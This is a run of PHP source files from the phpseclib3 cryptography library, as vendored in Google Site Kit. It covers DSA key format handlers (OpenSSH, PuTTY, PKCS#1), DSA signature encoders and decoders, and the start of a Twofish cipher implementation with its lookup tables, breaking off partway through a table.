Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * OpenSSH Formatted DSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class OpenSSH extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\OpenSSH { /** * Supported Key Types * * @var array */ protected static $types = ['ssh-dss']; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $parsed = parent::load($key, $password); if (isset($parsed['paddedKey'])) { list($type) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('s', $parsed['paddedKey']); if ($type != $parsed['type']) { throw new \RuntimeException("The public and private keys are not of the same type ({$type} vs {$parsed['type']})"); } list($p, $q, $g, $y, $x, $comment) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('i5s', $parsed['paddedKey']); return \compact('p', 'q', 'g', 'y', 'x', 'comment'); } list($p, $q, $g, $y) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('iiii', $parsed['publicKey']); $comment = $parsed['comment']; return \compact('p', 'q', 'g', 'y', 'comment'); } /** * Convert a public key to the appropriate format * * @param BigInteger $p * @param BigInteger $q * @param BigInteger $g * @param BigInteger $y * @param array $options optional * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $q, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $g, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y, array $options = []) { if ($q->getLength() != 160) { throw new \InvalidArgumentException('SSH only supports keys with an N (length of Group Order q) of 160'); } // from <http://tools.ietf.org/html/rfc4253#page-15>: // string "ssh-dss" // mpint p // mpint q // mpint g // mpint y $DSAPublicKey = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('siiii', 'ssh-dss', $p, $q, $g, $y); if (isset($options['binary']) ? $options['binary'] : self::$binary) { return $DSAPublicKey; } $comment = isset($options['comment']) ? $options['comment'] : self::$comment; $DSAPublicKey = 'ssh-dss ' . \base64_encode($DSAPublicKey) . ' ' . $comment; return $DSAPublicKey; } /** * Convert a private key to the appropriate format. * * @param BigInteger $p * @param BigInteger $q * @param BigInteger $g * @param BigInteger $y * @param BigInteger $x * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $q, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $g, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x, $password = '', array $options = []) { $publicKey = self::savePublicKey($p, $q, $g, $y, ['binary' => \true]); $privateKey = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('si5', 'ssh-dss', $p, $q, $g, $y, $x); return self::wrapPrivateKey($publicKey, $privateKey, $password, $options); } } <?php /** * PuTTY Formatted DSA Key Handler * * puttygen does not generate DSA keys with an N of anything other than 160, however, * it can still load them and convert them. PuTTY will load them, too, but SSH servers * won't accept them. Since PuTTY formatted keys are primarily used with SSH this makes * keys with N > 160 kinda useless, hence this handlers not supporting such keys. * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PuTTY as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * PuTTY Formatted DSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PuTTY extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PuTTY { /** * Public Handler * * @var string */ const PUBLIC_HANDLER = 'Google\\Site_Kit_Dependencies\\phpseclib3\\Crypt\\DSA\\Formats\\Keys\\OpenSSH'; /** * Algorithm Identifier * * @var array */ protected static $types = ['ssh-dss']; /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $components = parent::load($key, $password); if (!isset($components['private'])) { return $components; } \extract($components); unset($components['public'], $components['private']); list($p, $q, $g, $y) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('iiii', $public); list($x) = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('i', $private); return \compact('p', 'q', 'g', 'y', 'x', 'comment'); } /** * Convert a private key to the appropriate format. * * @param BigInteger $p * @param BigInteger $q * @param BigInteger $g * @param BigInteger $y * @param BigInteger $x * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $q, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $g, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x, $password = \false, array $options = []) { if ($q->getLength() != 160) { throw new \InvalidArgumentException('SSH only supports keys with an N (length of Group Order q) of 160'); } $public = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('iiii', $p, $q, $g, $y); $private = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('i', $x); return self::wrapPrivateKey($public, $private, 'ssh-dss', $password, $options); } /** * Convert a public key to the appropriate format * * @param BigInteger $p * @param BigInteger $q * @param BigInteger $g * @param BigInteger $y * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $q, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $g, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y) { if ($q->getLength() != 160) { throw new \InvalidArgumentException('SSH only supports keys with an N (length of Group Order q) of 160'); } return self::wrapPublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('iiii', $p, $q, $g, $y), 'ssh-dss'); } } <?php /** * PKCS#1 Formatted DSA Key Handler * * PHP version 5 * * Used by File/X509.php * * Processes keys with the following headers: * * -----BEGIN DSA PRIVATE KEY----- * -----BEGIN DSA PUBLIC KEY----- * -----BEGIN DSA PARAMETERS----- * * Analogous to ssh-keygen's pem format (as specified by -m) * * Also, technically, PKCS1 decribes RSA but I am not aware of a formal specification for DSA. * The DSA private key format seems to have been adapted from the RSA private key format so * we're just re-using that as the name. * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2015 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Formats\Keys; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS1 as Progenitor; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * PKCS#1 Formatted DSA Key Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class PKCS1 extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Keys\PKCS1 { /** * Break a public or private key down into its constituent components * * @param string $key * @param string $password optional * @return array */ public static function load($key, $password = '') { $key = parent::load($key, $password); $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($key); if (!$decoded) { throw new \RuntimeException('Unable to decode BER'); } $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DSAParams::MAP); if (\is_array($key)) { return $key; } $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DSAPrivateKey::MAP); if (\is_array($key)) { return $key; } $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DSAPublicKey::MAP); if (\is_array($key)) { return $key; } throw new \RuntimeException('Unable to perform ASN1 mapping'); } /** * Convert DSA parameters to the appropriate format * * @param BigInteger $p * @param BigInteger $q * @param BigInteger $g * @return string */ public static function saveParameters(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $q, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $g) { $key = ['p' => $p, 'q' => $q, 'g' => $g]; $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($key, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DSAParams::MAP); return "-----BEGIN DSA PARAMETERS-----\r\n" . \chunk_split(\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::base64_encode($key), 64) . "-----END DSA PARAMETERS-----\r\n"; } /** * Convert a private key to the appropriate format. * * @param BigInteger $p * @param BigInteger $q * @param BigInteger $g * @param BigInteger $y * @param BigInteger $x * @param string $password optional * @param array $options optional * @return string */ public static function savePrivateKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $q, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $g, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $x, $password = '', array $options = []) { $key = ['version' => 0, 'p' => $p, 'q' => $q, 'g' => $g, 'y' => $y, 'x' => $x]; $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($key, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DSAPrivateKey::MAP); return self::wrapPrivateKey($key, 'DSA', $password, $options); } /** * Convert a public key to the appropriate format * * @param BigInteger $p * @param BigInteger $q * @param BigInteger $g * @param BigInteger $y * @return string */ public static function savePublicKey(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $p, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $q, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $g, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $y) { $key = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER($y, \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DSAPublicKey::MAP); return self::wrapPublicKey($key, 'DSA'); } } <?php /** * Raw DSA Signature Handler * * PHP version 5 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Formats\Signature; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Signature\Raw as Progenitor; /** * Raw DSA Signature Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Raw extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\Formats\Signature\Raw { } <?php /** * SSH2 Signature Handler * * PHP version 5 * * Handles signatures in the format used by SSH2 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Formats\Signature; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * SSH2 Signature Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class SSH2 { /** * Loads a signature * * @param string $sig * @return mixed */ public static function load($sig) { if (!\is_string($sig)) { return \false; } $result = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::unpackSSH2('ss', $sig); if ($result === \false) { return \false; } list($type, $blob) = $result; if ($type != 'ssh-dss' || \strlen($blob) != 40) { return \false; } return ['r' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\substr($blob, 0, 20), 256), 's' => new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger(\substr($blob, 20), 256)]; } /** * Returns a signature in the appropriate format * * @param BigInteger $r * @param BigInteger $s * @return string */ public static function save(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $r, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $s) { if ($r->getLength() > 160 || $s->getLength() > 160) { return \false; } return \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::packSSH2('ss', 'ssh-dss', \str_pad($r->toBytes(), 20, "\x00", \STR_PAD_LEFT) . \str_pad($s->toBytes(), 20, "\x00", \STR_PAD_LEFT)); } } <?php /** * ASN1 Signature Handler * * PHP version 5 * * Handles signatures in the format described in * https://tools.ietf.org/html/rfc3279#section-2.2.2 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2016 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt\DSA\Formats\Signature; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1 as Encoder; use Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * ASN1 Signature Handler * * @author Jim Wigginton <terrafrost@php.net> */ abstract class ASN1 { /** * Loads a signature * * @param string $sig * @return array|bool */ public static function load($sig) { if (!\is_string($sig)) { return \false; } $decoded = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::decodeBER($sig); if (empty($decoded)) { return \false; } $components = \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::asn1map($decoded[0], \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DssSigValue::MAP); return $components; } /** * Returns a signature in the appropriate format * * @param BigInteger $r * @param BigInteger $s * @return string */ public static function save(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $r, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger $s) { return \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1::encodeDER(\compact('r', 's'), \Google\Site_Kit_Dependencies\phpseclib3\File\ASN1\Maps\DssSigValue::MAP); } } <?php /** * Pure-PHP implementation of Twofish. * * Uses mcrypt, if available, and an internal implementation, otherwise. * * PHP version 5 * * Useful resources are as follows: * * - {@link http://en.wikipedia.org/wiki/Twofish Wikipedia description of Twofish} * * Here's a short example of how to use this library: * <code> * <?php * include 'vendor/autoload.php'; * * $twofish = new \phpseclib3\Crypt\Twofish('ctr'); * * $twofish->setKey('12345678901234567890123456789012'); * * $plaintext = str_repeat('a', 1024); * * echo $twofish->decrypt($twofish->encrypt($plaintext)); * ?> * </code> * * @author Jim Wigginton <terrafrost@php.net> * @author Hans-Juergen Petrich <petrich@tronic-media.com> * @copyright 2007 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://phpseclib.sourceforge.net */ namespace Google\Site_Kit_Dependencies\phpseclib3\Crypt; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\BlockCipher; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadModeException; /** * Pure-PHP implementation of Twofish. * * @author Jim Wigginton <terrafrost@php.net> * @author Hans-Juergen Petrich <petrich@tronic-media.com> */ class Twofish extends \Google\Site_Kit_Dependencies\phpseclib3\Crypt\Common\BlockCipher { /** * The mcrypt specific name of the cipher * * @see \phpseclib3\Crypt\Common\SymmetricKey::cipher_name_mcrypt * @var string */ protected $cipher_name_mcrypt = 'twofish'; /** * Optimizing value while CFB-encrypting * * @see \phpseclib3\Crypt\Common\SymmetricKey::cfb_init_len * @var int */ protected $cfb_init_len = 800; /** * Q-Table * * @var array */ private static $q0 = [0xa9, 0x67, 0xb3, 0xe8, 0x4, 0xfd, 0xa3, 0x76, 0x9a, 0x92, 0x80, 0x78, 0xe4, 0xdd, 0xd1, 0x38, 0xd, 0xc6, 0x35, 0x98, 0x18, 0xf7, 0xec, 0x6c, 0x43, 0x75, 0x37, 0x26, 0xfa, 0x13, 0x94, 0x48, 0xf2, 0xd0, 0x8b, 0x30, 0x84, 0x54, 0xdf, 0x23, 0x19, 0x5b, 0x3d, 0x59, 0xf3, 0xae, 0xa2, 0x82, 0x63, 0x1, 0x83, 0x2e, 0xd9, 0x51, 0x9b, 0x7c, 0xa6, 0xeb, 0xa5, 0xbe, 0x16, 0xc, 0xe3, 0x61, 0xc0, 0x8c, 0x3a, 0xf5, 0x73, 0x2c, 0x25, 0xb, 0xbb, 0x4e, 0x89, 0x6b, 0x53, 0x6a, 0xb4, 0xf1, 0xe1, 0xe6, 0xbd, 0x45, 0xe2, 0xf4, 0xb6, 0x66, 0xcc, 0x95, 0x3, 0x56, 0xd4, 0x1c, 0x1e, 0xd7, 0xfb, 0xc3, 0x8e, 0xb5, 0xe9, 0xcf, 0xbf, 0xba, 0xea, 0x77, 0x39, 0xaf, 0x33, 0xc9, 0x62, 0x71, 0x81, 0x79, 0x9, 0xad, 0x24, 0xcd, 0xf9, 0xd8, 0xe5, 0xc5, 0xb9, 0x4d, 0x44, 0x8, 0x86, 0xe7, 0xa1, 0x1d, 0xaa, 0xed, 0x6, 0x70, 0xb2, 0xd2, 0x41, 0x7b, 0xa0, 0x11, 0x31, 0xc2, 0x27, 0x90, 0x20, 0xf6, 0x60, 0xff, 0x96, 0x5c, 0xb1, 0xab, 0x9e, 0x9c, 0x52, 0x1b, 0x5f, 0x93, 0xa, 0xef, 0x91, 0x85, 0x49, 0xee, 0x2d, 0x4f, 0x8f, 0x3b, 0x47, 0x87, 0x6d, 0x46, 0xd6, 0x3e, 0x69, 0x64, 0x2a, 0xce, 0xcb, 0x2f, 0xfc, 0x97, 0x5, 0x7a, 0xac, 0x7f, 0xd5, 0x1a, 0x4b, 0xe, 0xa7, 0x5a, 0x28, 0x14, 0x3f, 0x29, 0x88, 0x3c, 0x4c, 0x2, 0xb8, 0xda, 0xb0, 0x17, 0x55, 0x1f, 0x8a, 0x7d, 0x57, 0xc7, 0x8d, 0x74, 0xb7, 0xc4, 0x9f, 0x72, 0x7e, 0x15, 0x22, 0x12, 0x58, 0x7, 0x99, 0x34, 0x6e, 0x50, 0xde, 0x68, 0x65, 0xbc, 0xdb, 0xf8, 0xc8, 0xa8, 0x2b, 0x40, 0xdc, 0xfe, 0x32, 0xa4, 0xca, 0x10, 0x21, 0xf0, 0xd3, 0x5d, 0xf, 0x0, 0x6f, 0x9d, 0x36, 0x42, 0x4a, 0x5e, 0xc1, 0xe0]; /** * Q-Table * * @var array */ private static $q1 = [0x75, 0xf3, 0xc6, 0xf4, 0xdb, 0x7b, 0xfb, 0xc8, 0x4a, 0xd3, 0xe6, 0x6b, 0x45, 0x7d, 0xe8, 0x4b, 0xd6, 0x32, 0xd8, 0xfd, 0x37, 0x71, 0xf1, 0xe1, 0x30, 0xf, 0xf8, 0x1b, 0x87, 0xfa, 0x6, 0x3f, 0x5e, 0xba, 0xae, 0x5b, 0x8a, 0x0, 0xbc, 0x9d, 0x6d, 0xc1, 0xb1, 0xe, 0x80, 0x5d, 0xd2, 0xd5, 0xa0, 0x84, 0x7, 0x14, 0xb5, 0x90, 0x2c, 0xa3, 0xb2, 0x73, 0x4c, 0x54, 0x92, 0x74, 0x36, 0x51, 0x38, 0xb0, 0xbd, 0x5a, 0xfc, 0x60, 0x62, 0x96, 0x6c, 0x42, 0xf7, 0x10, 0x7c, 0x28, 0x27, 0x8c, 0x13, 0x95, 0x9c, 0xc7, 0x24, 0x46, 0x3b, 0x70, 0xca, 0xe3, 0x85, 0xcb, 0x11, 0xd0, 0x93, 0xb8, 0xa6, 0x83, 0x20, 0xff, 0x9f, 0x77, 0xc3, 0xcc, 0x3, 0x6f, 0x8, 0xbf, 0x40, 0xe7, 0x2b, 0xe2, 0x79, 0xc, 0xaa, 0x82, 0x41, 0x3a, 0xea, 0xb9, 0xe4, 0x9a, 0xa4, 0x97, 0x7e, 0xda, 0x7a, 0x17, 0x66, 0x94, 0xa1, 0x1d, 0x3d, 0xf0, 0xde, 0xb3, 0xb, 0x72, 0xa7, 0x1c, 0xef, 0xd1, 0x53, 0x3e, 0x8f, 0x33, 0x26, 0x5f, 0xec, 0x76, 0x2a, 0x49, 0x81, 0x88, 0xee, 0x21, 0xc4, 0x1a, 0xeb, 0xd9, 0xc5, 0x39, 0x99, 0xcd, 0xad, 0x31, 0x8b, 0x1, 0x18, 0x23, 0xdd, 0x1f, 0x4e, 0x2d, 0xf9, 0x48, 0x4f, 0xf2, 0x65, 0x8e, 0x78, 0x5c, 0x58, 0x19, 0x8d, 0xe5, 0x98, 0x57, 0x67, 0x7f, 0x5, 0x64, 0xaf, 0x63, 0xb6, 0xfe, 0xf5, 0xb7, 0x3c, 0xa5, 0xce, 0xe9, 0x68, 0x44, 0xe0, 0x4d, 0x43, 0x69, 0x29, 0x2e, 0xac, 0x15, 0x59, 0xa8, 0xa, 0x9e, 0x6e, 0x47, 0xdf, 0x34, 0x35, 0x6a, 0xcf, 0xdc, 0x22, 0xc9, 0xc0, 0x9b, 0x89, 0xd4, 0xed, 0xab, 0x12, 0xa2, 0xd, 0x52, 0xbb, 0x2, 0x2f, 0xa9, 0xd7, 0x61, 0x1e, 0xb4, 0x50, 0x4, 0xf6, 0xc2, 0x16, 0x25, 0x86, 0x56, 0x55, 0x9, 0xbe, 0x91]; /** * M-Table * * @var array */ private static $m0 = [0xbcbc3275, 0xecec21f3, 0x202043c6, 0xb3b3c9f4, 0xdada03db, 0x2028b7b, 0xe2e22bfb, 0x9e9efac8, 0xc9c9ec4a, 0xd4d409d3, 0x18186be6, 0x1e1e9f6b, 0x98980e45, 0xb2b2387d, 0xa6a6d2e8, 0x2626b74b, 0x3c3c57d6, 0x93938a32, 0x8282eed8, 0x525298fd, 0x7b7bd437, 0xbbbb3771, 0x5b5b97f1, 0x474783e1, 0x24243c30, 0x5151e20f, 0xbabac6f8, 0x4a4af31b, 0xbfbf4887, 0xd0d70fa, 0xb0b0b306, 0x7575de3f, 0xd2d2fd5e, 0x7d7d20ba, 0x666631ae, 0x3a3aa35b, 0x59591c8a, 0x0, 0xcdcd93bc, 0x1a1ae09d, 0xaeae2c6d, 0x7f7fabc1, 0x2b2bc7b1, 0xbebeb90e, 0xe0e0a080, 0x8a8a105d, 0x3b3b52d2, 0x6464bad5, 0xd8d888a0, 0xe7e7a584, 0x5f5fe807, 0x1b1b1114, 0x2c2cc2b5, 0xfcfcb490, 0x3131272c, 0x808065a3, 0x73732ab2, 0xc0c8173, 0x79795f4c, 0x6b6b4154, 0x4b4b0292, 0x53536974, 0x94948f36, 0x83831f51, 0x2a2a3638, 0xc4c49cb0, 0x2222c8bd, 0xd5d5f85a, 0xbdbdc3fc, 0x48487860, 0xffffce62, 0x4c4c0796, 0x4141776c, 0xc7c7e642, 0xebeb24f7, 0x1c1c1410, 0x5d5d637c, 0x36362228, 0x6767c027, 0xe9e9af8c, 0x4444f913, 0x1414ea95, 0xf5f5bb9c, 0xcfcf18c7, 0x3f3f2d24, 0xc0c0e346, 0x7272db3b, 0x54546c70, 0x29294cca, 0xf0f035e3, 0x808fe85, 0xc6c617cb, 0xf3f34f11, 0x8c8ce4d0, 0xa4a45993, 0xcaca96b8, 0x68683ba6, 0xb8b84d83, 0x38382820, 0xe5e52eff, 0xadad569f, 0xb0b8477, 0xc8c81dc3, 0x9999ffcc, 0x5858ed03, 0x19199a6f, 0xe0e0a08, 0x95957ebf, 0x70705040, 0xf7f730e7, 0x6e6ecf2b, 0x1f1f6ee2, 0xb5b53d79, 0x9090f0c, 0x616134aa, 0x57571682, 0x9f9f0b41, 0x9d9d803a, 0x111164ea, 0x2525cdb9, 0xafafdde4, 0x4545089a, 0xdfdf8da4, 0xa3a35c97, 0xeaead57e, 0x353558da, 0xededd07a, 0x4343fc17, 0xf8f8cb66, 0xfbfbb194, 0x3737d3a1, 0xfafa401d, 0xc2c2683d, 0xb4b4ccf0, 0x32325dde, 0x9c9c71b3, 0x5656e70b, 0xe3e3da72, 0x878760a7, 0x15151b1c, 0xf9f93aef, 0x6363bfd1, 0x3434a953, 0x9a9a853e, 0xb1b1428f, 0x7c7cd133, 0x88889b26, 0x3d3da65f, 0xa1a1d7ec, 0xe4e4df76, 0x8181942a, 0x91910149, 0xf0ffb81, 0xeeeeaa88, 0x161661ee, 0xd7d77321, 0x9797f5c4, 0xa5a5a81a, 0xfefe3feb, 0x6d6db5d9, 0x7878aec5, 0xc5c56d39, 0x1d1de599, 0x7676a4cd, 0x3e3edcad, 0xcbcb6731, 0xb6b6478b, 0xefef5b01, 0x12121e18, 0x6060c523, 0x6a6ab0dd, 0x4d4df61f, 0xcecee94e, 0xdede7c2d, 0x55559df9, 0x7e7e5a48, 0x2121b24f, 0x3037af2, 0xa0a02665, 0x5e5e198e, 0x5a5a6678, 0x65654b5c, 0x62624e58, 0xfdfd4519, 0x606f48d, 0x404086e5, 0xf2f2be98, 0x3333ac57, 0x17179067, 0x5058e7f, 0xe8e85e05, 0x4f4f7d64, 0x89896aaf, 0x10109563, 0x74742fb6, 0xa0a75fe, 0x5c5c92f5, 0x9b9b74b7, 0x2d2d333c, 0x3030d6a5, 0x2e2e49ce, 0x494989e9, 0x46467268, 0x77775544, 0xa8a8d8e0, 0x9696044d, 0x2828bd43, 0xa9a92969, 0xd9d97929, 0x8686912e, 0xd1d187ac, 0xf4f44a15, 0x8d8d1559, 0xd6d682a8, 0xb9b9bc0a, 0x42420d9e, 0xf6f6c16e, 0x2f2fb847, 0xdddd06df, 0x23233934, 0xcccc6235, 0xf1f1c46a, 0xc1c112cf, 0x8585ebdc, 0x8f8f9e22, 0x7171a1c9, 0x9090f0c0, 0xaaaa539b, 0x101f189, 0x8b8be1d4, 0x4e4e8ced, 0x8e8e6fab, 0xababa212, 0x6f6f3ea2, 0xe6e6540d, 0xdbdbf252, 0x92927bbb, 0xb7b7b602, 0x6969ca2f, 0x3939d9a9, 0xd3d30cd7, 0xa7a72361, 0xa2a2ad1e, 0xc3c399b4, 0x6c6c4450, 0x7070504, 0x4047ff6, 0x272746c2, 0xacaca716, 0xd0d07625, 0x50501386, 0xdcdcf756, 0x84841a55, 0xe1e15109, 0x7a7a25be, 0x1313ef91]; /** * M-Table * * @var array */ private static $m1 = [0xa9d93939, 0x67901717, 0xb3719c9c, 0xe8d2a6a6, 0x4050707, 0xfd985252, 0xa3658080, 0x76dfe4e4, 0x9a084545, 0x92024b4b, 0x80a0e0e0, 0x78665a5a, 0xe4ddafaf, 0xddb06a6a, 0xd1bf6363, 0x38362a2a, 0xd54e6e6, 0xc6432020, 0x3562cccc, 0x98bef2f2, 0x181e1212, 0xf724ebeb, 0xecd7a1a1, 0x6c774141, 0x43bd2828, 0x7532bcbc, 0x37d47b7b, 0x269b8888, 0xfa700d0d, 0x13f94444, 0x94b1fbfb, 0x485a7e7e, 0xf27a0303, 0xd0e48c8c, 0x8b47b6b6, 0x303c2424, 0x84a5e7e7, 0x54416b6b, 0xdf06dddd, 0x23c56060, 0x1945fdfd, 0x5ba33a3a, 0x3d68c2c2, 0x59158d8d, 0xf321ecec, 0xae316666, 0xa23e6f6f, 0x82165757, 0x63951010, 0x15befef, 0x834db8b8, 0x2e918686, 0xd9b56d6d, 0x511f8383, 0x9b53aaaa, 0x7c635d5d, 0xa63b6868, 0xeb3ffefe, 0xa5d63030, 0xbe257a7a, 0x16a7acac, 0xc0f0909, 0xe335f0f0, 0x6123a7a7, 0xc0f09090, 0x8cafe9e9, 0x3a809d9d, 0xf5925c5c, 0x73810c0c, 0x2c273131, 0x2576d0d0, 0xbe75656, 0xbb7b9292, 0x4ee9cece, 0x89f10101, 0x6b9f1e1e, 0x53a93434, 0x6ac4f1f1, 0xb499c3c3, 0xf1975b5b, 0xe1834747, 0xe66b1818, 0xbdc82222, 0x450e9898, 0xe26e1f1f, 0xf4c9b3b3, 0xb62f7474, 0x66cbf8f8, 0xccff9999, 0x95ea1414, 0x3ed5858, 0x56f7dcdc, 0xd4e18b8b, 0x1c1b1515, 0x1eada2a2, 0xd70cd3d3, 0xfb2be2e2, 0xc31dc8c8, 0x8e195e5e, 0xb5c22c2c, 0xe9894949, 0xcf12c1c1, 0xbf7e9595, 0xba207d7d, 0xea641111, 0x77840b0b, 0x396dc5c5, 0xaf6a8989, 0x33d17c7c, 0xc9a17171, 0x62ceffff, 0x7137bbbb, 0x81fb0f0f, 0x793db5b5, 0x951e1e1, 0xaddc3e3e, 0x242d3f3f, 0xcda47676, 0xf99d5555, 0xd8ee8282, 0xe5864040, 0xc5ae7878, 0xb9cd2525, 0x4d049696, 0x44557777, 0x80a0e0e, 0x86135050, 0xe730f7f7, 0xa1d33737, 0x1d40fafa, 0xaa346161, 0xed8c4e4e, 0x6b3b0b0, 0x706c5454, 0xb22a7373, 0xd2523b3b, 0x410b9f9f, 0x7b8b0202, 0xa088d8d8, 0x114ff3f3, 0x3167cbcb, 0xc2462727, 0x27c06767, 0x90b4fcfc, 0x20283838, 0xf67f0404, 